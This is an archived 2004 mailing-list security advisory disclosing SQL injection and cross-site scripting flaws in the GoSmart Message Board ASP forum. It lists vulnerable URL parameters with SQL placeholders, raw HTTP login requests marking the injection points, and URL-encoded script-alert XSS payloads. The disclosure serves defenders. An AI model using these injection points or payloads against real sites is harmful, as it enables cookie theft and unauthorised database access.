lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <02b701c4afc3$44bc2140$0d8cfda7@rfets.gov>
From: antipov at SecurityLab.ru (Alexander Antipov)
Subject: [MAxpatrol Security Advisory]  Multiple vulnerabilities in GoSmart Message Board

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).
 

Date: 11.10.04

Severity: Low

 

Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx

 

Platform: ASP

 

I. DESCRIPTION

--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote
user can conduct SQL injection attack and Cross site scripting attack. 



1. SQL injection (minimal risk, because using Access database)

 
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=[SQL CODE HERE]&Password=1&Login=1 


POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=1&Password=[SQL CODE HERE]&Login=1

 
2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%
28%29%3C%2Fscript%3E%3C%22


 

II. IMPACT

----------


A remote user can access the target user's cookies (including
authentication cookies).   

A remote user can cause SQL commands to be executed by the underlying
database.

 


III. SOLUTION

-------------
Not available currently.

 

IV. VENDOR FIX/RESPONSE

-----------------------
n/a
 

V. CREDIT

-------------
Positive Technologies (www.ptsecurity.com) is information security
company especially focused on development of MaxPatrol - professional
security scanner.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ